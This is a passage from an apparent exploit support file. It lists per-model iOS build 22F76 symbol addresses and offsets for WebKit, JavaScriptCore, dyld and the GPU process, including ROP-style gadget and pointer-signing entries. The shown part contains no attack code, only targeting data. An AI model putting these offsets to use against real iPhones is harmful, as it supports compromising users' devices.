958 privateState_off: 0x7e8n, 959 pthread_create_jsc: 0x19bd26f30n, 960 pthread_create_offset: 0x6988n, 961 runLoopHolder_tid: 0x1edb3c708n, 962 rxBufferMtl_off: 0x100n, 963 rxMtlBuffer_off: 0x70n, 964 vertexAttribVector_off: 0x2548n 965 }, 966 "iPhone14,3_22F76": { 967 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf3d8n, 968 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadeec0n, 969 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadee20n, 970 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadee70n, 971 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade268n, 972 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 973 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 974 CAPointer: 0x20n, 975 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 976 CGContextDelegate: 0x28n, 977 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 978 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 979 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 980 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 981 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 982 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 983 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 984 DesktopServicesPriv_bss: 0x1ecca3a08n, 985 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebf88n, 986 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 987 GPUProcess_singleton: 0x1eb924a98n, 988 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 989 HOMEUI_cstring: 0x182f75636n, 990 IOSurfaceContextDelegate: 0x120n, 991 IOSurfaceDrawable: 0x150n, 992 IOSurfaceQueue: 0x48n, 993 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 994 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be8f0n, 995 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be5a0n, 996 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be5a8n, 997 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be5b0n, 998 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be4f0n, 999 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be5b8n, 1000 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 1001 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 1002 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 1003 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 1004 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 1005 PerfPowerServicesReader_cstring: 0x258023e60n, 1006 RemoteGraphicsContextGLWorkQueue: 0x1eda5eb58n, 1007 RemoteRenderingBackendProxy_off: 0x830n, 1008 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 1009 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 1010 Security__gSecurityd: 0x1eb67fd78n, 1011 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 1012 UI_m_connection: 0x28n, 1013 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 1014 WebCore__PAL_getPKContactClass: 0x1eda62db8n, 1015 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 1016 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 1017 WebCore__initPKContact_once: 0x1eda6b8f8n, 1018 WebCore__initPKContact_value: 0x1eda6b900n, 1019 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6a0c0n, 1020 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6a0b8n, 1021 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6a0a0n, 1022 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 1023 WebProcess_ensureGPUProcessConnection: 0x199195958n, 1024 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 1025 WebProcess_singleton: 0x1eda5fd00n, 1026 __pthread_head: 0x26a158020n, 1027 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 1028 dyld__RuntimeState_vtable: 0x1f2871aa0n, 1029 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 1030 dyld__signPointer: 0x1a9a3f3e4n, 1031 emptyString: 0x1edb14420n, 1032 free_slabs: 0x1ed9a56d0n, 1033 gadget_control_1_ios184: 0x23f0ce2ecn, 1034 gadget_control_2_ios184: 0x1ad86ac28n, 1035 gadget_control_3_ios184: 0x21f275150n, 1036 gadget_loop_1_ios184: 0x1865f818cn, 1037 gadget_loop_2_ios184: 0x20d249da8n, 1038 gadget_loop_3_ios184: 0x184d29f1cn, 1039 gadget_set_all_registers_ios184: 0x20dfc216cn, 1040 jsc_base: 0x19a45a000n, 1041 libARI_cstring: 0x218ad3820n, 1042 libGPUCompilerImplLazy__invoker: 0x23ce737e8n, 1043 libGPUCompilerImplLazy_cstring: 0x23bfbd870n, 1044 libdyld__dlopen: 0x1ad86c7b8n, 1045 libdyld__dlsym: 0x1ad86da34n, 1046 libdyld__gAPIs: 0x1ed5b8000n, 1047 libsystem_c__atexit_mutex: 0x1ed8cab98n, 1048 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 1049 libsystem_pthread_base: 0x20d298000n, 1050 m_backend: 0x70n, 1051 m_drawingArea: 0x50n, 1052 m_gpuProcessConnection: 0x158n, 1053 m_gpuProcessConnection_m_identifier: 0x38n, 1054 m_imageBuffer: 0x18n, 1055 m_isRenderingSuspended: 0xe8n, 1056 m_platformContext: 0x38n, 1057 m_remoteDisplayLists: 0x70n, 1058 m_remoteRenderingBackendMap: 0xe8n, 1059 m_webProcessConnections: 0x80n, 1060 mach_task_self_ptr: 0x1ed8c9e00n, 1061 mainRunLoop: 0x1edb2c020n, 1062 privateState_off: 0x7e8n, 1063 pthread_create_jsc: 0x19bd26f30n, 1064 pthread_create_offset: 0x6988n, 1065 runLoopHolder_tid: 0x1edb3c708n, 1066 rxBufferMtl_off: 0x100n, 1067 rxMtlBuffer_off: 0x70n, 1068 vertexAttribVector_off: 0x2548n 1069 }, 1070 "iPhone14,4_22F76": { 1071 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf2d8n, 1072 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadedc0n, 1073 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edaded20n, 1074 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edaded70n, 1075 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade168n, 1076 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 1077 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 1078 CAPointer: 0x20n, 1079 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 1080 CGContextDelegate: 0x28n, 1081 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 1082 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 1083 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 1084 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 1085 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 1086 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 1087 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 1088 DesktopServicesPriv_bss: 0x1ecca3a08n, 1089 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebe88n, 1090 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1091 GPUProcess_singleton: 0x1eb924a98n, 1092 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 1093 HOMEUI_cstring: 0x182f75636n, 1094 IOSurfaceContextDelegate: 0x120n, 1095 IOSurfaceDrawable: 0x150n, 1096 IOSurfaceQueue: 0x48n, 1097 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 1098 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be7f0n, 1099 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be4a0n, 1100 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be4a8n, 1101 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be4b0n, 1102 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be3f0n, 1103 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be4b8n, 1104 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 1105 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 1106 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 1107 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 1108 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 1109 PerfPowerServicesReader_cstring: 0x257ec3e60n, 1110 RemoteGraphicsContextGLWorkQueue: 0x1eda5ea58n, 1111 RemoteRenderingBackendProxy_off: 0x830n, 1112 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 1113 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 1114 Security__gSecurityd: 0x1eb67fd78n, 1115 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 1116 UI_m_connection: 0x28n, 1117 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 1118 WebCore__PAL_getPKContactClass: 0x1eda62cb8n, 1119 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 1120 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 1121 WebCore__initPKContact_once: 0x1eda6b7f8n, 1122 WebCore__initPKContact_value: 0x1eda6b800n, 1123 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69fc0n, 1124 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69fb8n, 1125 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69fa0n, 1126 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 1127 WebProcess_ensureGPUProcessConnection: 0x199195958n, 1128 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 1129 WebProcess_singleton: 0x1eda5fc00n, 1130 __pthread_head: 0x269740020n, 1131 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 1132 dyld__RuntimeState_vtable: 0x1f2871aa0n, 1133 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 1134 dyld__signPointer: 0x1a9a3f3e4n, 1135 emptyString: 0x1edb14420n, 1136 free_slabs: 0x1ed9a55d0n, 1137 gadget_control_1_ios184: 0x23f0ca2ecn, 1138 gadget_control_2_ios184: 0x1ad86ac28n, 1139 gadget_control_3_ios184: 0x21f271150n, 1140 gadget_loop_1_ios184: 0x1865f818cn, 1141 gadget_loop_2_ios184: 0x20d245da8n, 1142 gadget_loop_3_ios184: 0x184d29f1cn, 1143 gadget_set_all_registers_ios184: 0x20dfbe16cn, 1144 jsc_base: 0x19a45a000n, 1145 libARI_cstring: 0x218acf820n, 1146 libGPUCompilerImplLazy__invoker: 0x23ce6f7e8n, 1147 libGPUCompilerImplLazy_cstring: 0x23bfb9870n, 1148 libdyld__dlopen: 0x1ad86c7b8n, 1149 libdyld__dlsym: 0x1ad86da34n, 1150 libdyld__gAPIs: 0x1ed5b8000n, 1151 libsystem_c__atexit_mutex: 0x1ed8caa98n, 1152 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 1153 libsystem_pthread_base: 0x20d294000n, 1154 m_backend: 0x70n, 1155 m_drawingArea: 0x50n, 1156 m_gpuProcessConnection: 0x158n, 1157 m_gpuProcessConnection_m_identifier: 0x38n, 1158 m_imageBuffer: 0x18n, 1159 m_isRenderingSuspended: 0xe8n, 1160 m_platformContext: 0x38n, 1161 m_remoteDisplayLists: 0x70n, 1162 m_remoteRenderingBackendMap: 0xe8n, 1163 m_webProcessConnections: 0x80n, 1164 mach_task_self_ptr: 0x1ed8c9d00n, 1165 mainRunLoop: 0x1edb2c020n, 1166 privateState_off: 0x7e8n, 1167 pthread_create_jsc: 0x19bd26f30n, 1168 pthread_create_offset: 0x6988n, 1169 runLoopHolder_tid: 0x1edb3c708n, 1170 rxBufferMtl_off: 0x100n, 1171 rxMtlBuffer_off: 0x70n, 1172 vertexAttribVector_off: 0x2548n 1173 }, 1174 "iPhone14,5_22F76": { 1175 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf2d8n, 1176 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadedc0n, 1177 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edaded20n, 1178 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edaded70n, 1179 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade168n, 1180 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 1181 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 1182 CAPointer: 0x20n, 1183 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 1184 CGContextDelegate: 0x28n, 1185 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 1186 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 1187 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 1188 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 1189 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 1190 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 1191 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 1192 DesktopServicesPriv_bss: 0x1ecca3a08n, 1193 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebe88n, 1194 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1195 GPUProcess_singleton: 0x1eb924a98n, 1196 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 1197 HOMEUI_cstring: 0x182f75636n, 1198 IOSurfaceContextDelegate: 0x120n, 1199 IOSurfaceDrawable: 0x150n, 1200 IOSurfaceQueue: 0x48n, 1201 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 1202 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be7f0n, 1203 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be4a0n, 1204 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be4a8n, 1205 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be4b0n, 1206 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be3f0n, 1207 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be4b8n, 1208 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 1209 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 1210 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 1211 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 1212 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 1213 PerfPowerServicesReader_cstring: 0x257ec3e60n, 1214 RemoteGraphicsContextGLWorkQueue: 0x1eda5ea58n, 1215 RemoteRenderingBackendProxy_off: 0x830n, 1216 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 1217 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 1218 Security__gSecurityd: 0x1eb67fd78n, 1219 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 1220 UI_m_connection: 0x28n, 1221 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 1222 WebCore__PAL_getPKContactClass: 0x1eda62cb8n, 1223 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 1224 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 1225 WebCore__initPKContact_once: 0x1eda6b7f8n, 1226 WebCore__initPKContact_value: 0x1eda6b800n, 1227 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69fc0n, 1228 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69fb8n, 1229 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69fa0n, 1230 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 1231 WebProcess_ensureGPUProcessConnection: 0x199195958n, 1232 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 1233 WebProcess_singleton: 0x1eda5fc00n, 1234 __pthread_head: 0x269740020n, 1235 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 1236 dyld__RuntimeState_vtable: 0x1f2871aa0n, 1237 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 1238 dyld__signPointer: 0x1a9a3f3e4n, 1239 emptyString: 0x1edb14420n, 1240 free_slabs: 0x1ed9a55d0n, 1241 gadget_control_1_ios184: 0x23f0ca2ecn, 1242 gadget_control_2_ios184: 0x1ad86ac28n, 1243 gadget_control_3_ios184: 0x21f271150n, 1244 gadget_loop_1_ios184: 0x1865f818cn, 1245 gadget_loop_2_ios184: 0x20d245da8n, 1246 gadget_loop_3_ios184: 0x184d29f1cn, 1247 gadget_set_all_registers_ios184: 0x20dfbe16cn, 1248 jsc_base: 0x19a45a000n, 1249 libARI_cstring: 0x218acf820n, 1250 libGPUCompilerImplLazy__invoker: 0x23ce6f7e8n, 1251 libGPUCompilerImplLazy_cstring: 0x23bfb9870n, 1252 libdyld__dlopen: 0x1ad86c7b8n, 1253 libdyld__dlsym: 0x1ad86da34n, 1254 libdyld__gAPIs: 0x1ed5b8000n, 1255 libsystem_c__atexit_mutex: 0x1ed8caa98n, 1256 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 1257 libsystem_pthread_base: 0x20d294000n, 1258 m_backend: 0x70n, 1259 m_drawingArea: 0x50n, 1260 m_gpuProcessConnection: 0x158n, 1261 m_gpuProcessConnection_m_identifier: 0x38n, 1262 m_imageBuffer: 0x18n, 1263 m_isRenderingSuspended: 0xe8n, 1264 m_platformContext: 0x38n, 1265 m_remoteDisplayLists: 0x70n, 1266 m_remoteRenderingBackendMap: 0xe8n, 1267 m_webProcessConnections: 0x80n, 1268 mach_task_self_ptr: 0x1ed8c9d00n, 1269 mainRunLoop: 0x1edb2c020n, 1270 privateState_off: 0x7e8n, 1271 pthread_create_jsc: 0x19bd26f30n, 1272 pthread_create_offset: 0x6988n, 1273 runLoopHolder_tid: 0x1edb3c708n, 1274 rxBufferMtl_off: 0x100n, 1275 rxMtlBuffer_off: 0x70n, 1276 vertexAttribVector_off: 0x2548n 1277 }, 1278 "iPhone14,6_22F76": { 1279 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf098n, 1280 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadeb80n, 1281 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadeae0n, 1282 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadeb30n, 1283 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edaddf28n, 1284 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 1285 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 1286 CAPointer: 0x20n, 1287 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 1288 CGContextDelegate: 0x28n, 1289 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 1290 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 1291 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 1292 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 1293 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 1294 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 1295 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ada98n, 1296 DesktopServicesPriv_bss: 0x1ecca3a08n, 1297 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ebc48n, 1298 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1299 GPUProcess_singleton: 0x1eb924a98n, 1300 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 1301 HOMEUI_cstring: 0x182f75636n, 1302 IOSurfaceContextDelegate: 0x120n, 1303 IOSurfaceDrawable: 0x150n, 1304 IOSurfaceQueue: 0x48n, 1305 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 1306 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be5b0n, 1307 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be260n, 1308 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be268n, 1309 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be270n, 1310 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be1b0n, 1311 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be278n, 1312 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 1313 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 1314 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 1315 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 1316 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 1317 PerfPowerServicesReader_cstring: 0x257e27e60n, 1318 RemoteGraphicsContextGLWorkQueue: 0x1eda5e818n, 1319 RemoteRenderingBackendProxy_off: 0x830n, 1320 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 1321 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 1322 Security__gSecurityd: 0x1eb67fd78n, 1323 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 1324 UI_m_connection: 0x28n, 1325 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 1326 WebCore__PAL_getPKContactClass: 0x1eda62a78n, 1327 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 1328 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 1329 WebCore__initPKContact_once: 0x1eda6b5b8n, 1330 WebCore__initPKContact_value: 0x1eda6b5c0n, 1331 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda69d80n, 1332 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda69d78n, 1333 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda69d60n, 1334 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 1335 WebProcess_ensureGPUProcessConnection: 0x199195958n, 1336 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 1337 WebProcess_singleton: 0x1eda5f9c0n, 1338 __pthread_head: 0x2696e0020n, 1339 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 1340 dyld__RuntimeState_vtable: 0x1f2871aa0n, 1341 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 1342 dyld__signPointer: 0x1a9a3f3e4n, 1343 emptyString: 0x1edb14420n, 1344 free_slabs: 0x1ed9a5390n, 1345 gadget_control_1_ios184: 0x23f0362ecn, 1346 gadget_control_2_ios184: 0x1ad86ac28n, 1347 gadget_control_3_ios184: 0x21f261150n, 1348 gadget_loop_1_ios184: 0x1865f818cn, 1349 gadget_loop_2_ios184: 0x20d235da8n, 1350 gadget_loop_3_ios184: 0x184d29f1cn, 1351 gadget_set_all_registers_ios184: 0x20dfae16cn, 1352 jsc_base: 0x19a45a000n, 1353 libARI_cstring: 0x218abf820n, 1354 libGPUCompilerImplLazy__invoker: 0x23cddb7e8n, 1355 libGPUCompilerImplLazy_cstring: 0x23bf25870n, 1356 libdyld__dlopen: 0x1ad86c7b8n, 1357 libdyld__dlsym: 0x1ad86da34n, 1358 libdyld__gAPIs: 0x1ed5b8000n, 1359 libsystem_c__atexit_mutex: 0x1ed8ca858n, 1360 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 1361 libsystem_pthread_base: 0x20d284000n, 1362 m_backend: 0x70n, 1363 m_drawingArea: 0x50n, 1364 m_gpuProcessConnection: 0x158n, 1365 m_gpuProcessConnection_m_identifier: 0x38n, 1366 m_imageBuffer: 0x18n, 1367 m_isRenderingSuspended: 0xe8n, 1368 m_platformContext: 0x38n, 1369 m_remoteDisplayLists: 0x70n, 1370 m_remoteRenderingBackendMap: 0xe8n, 1371 m_webProcessConnections: 0x80n, 1372 mach_task_self_ptr: 0x1ed8c9ac0n, 1373 mainRunLoop: 0x1edb2c020n, 1374 privateState_off: 0x7e8n, 1375 pthread_create_jsc: 0x19bd26f30n, 1376 pthread_create_offset: 0x6988n, 1377 runLoopHolder_tid: 0x1edb3c708n, 1378 rxBufferMtl_off: 0x100n, 1379 rxMtlBuffer_off: 0x70n, 1380 vertexAttribVector_off: 0x2548n 1381 }, 1382 "iPhone14,7_22F76": { 1383 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf498n, 1384 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadef80n, 1385 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadeee0n, 1386 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadef30n, 1387 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade328n, 1388 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 1389 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 1390 CAPointer: 0x20n, 1391 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 1392 CGContextDelegate: 0x28n, 1393 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 1394 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 1395 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 1396 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 1397 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 1398 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 1399 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 1400 DesktopServicesPriv_bss: 0x1ecca3a08n, 1401 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ec048n, 1402 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 1403 GPUProcess_singleton: 0x1eb924a98n, 1404 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 1405 HOMEUI_cstring: 0x182f75636n, 1406 IOSurfaceContextDelegate: 0x120n, 1407 IOSurfaceDrawable: 0x150n, 1408 IOSurfaceQueue: 0x48n, 1409 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 1410 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9be9b0n, 1411 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be660n, 1412 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be668n, 1413 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be670n, 1414 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be5b0n, 1415 